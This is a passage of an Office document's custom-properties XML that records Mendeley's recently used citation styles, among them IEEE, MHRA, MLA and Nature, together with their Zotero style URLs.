  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="26" name="Mendeley Recent Style Name 6_1">
    <vt:lpwstr>IEEE</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="27" name="Mendeley Recent Style Id 7_1">
    <vt:lpwstr>http://www.zotero.org/styles/modern-humanities-research-association</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="28" name="Mendeley Recent Style Name 7_1">
    <vt:lpwstr>Modern Humanities Research Association 3rd edition (note with bibliography)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="29" name="Mendeley Recent Style Id 8_1">
    <vt:lpwstr>http://www.zotero.org/styles/modern-language-association</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="30" name="Mendeley Recent Style Name 8_1">
    <vt:lpwstr>Modern Language Association 8th edition</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="31" name="Mendeley Recent Style Id 9_1">
    <vt:lpwstr>http://www.zotero.org/styles/nature</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="32" name="Mendeley Recent Style Name 9_1">
    <vt:lpwstr>Nature</vt:lpwstr>
  </property>
</Properties>
</file>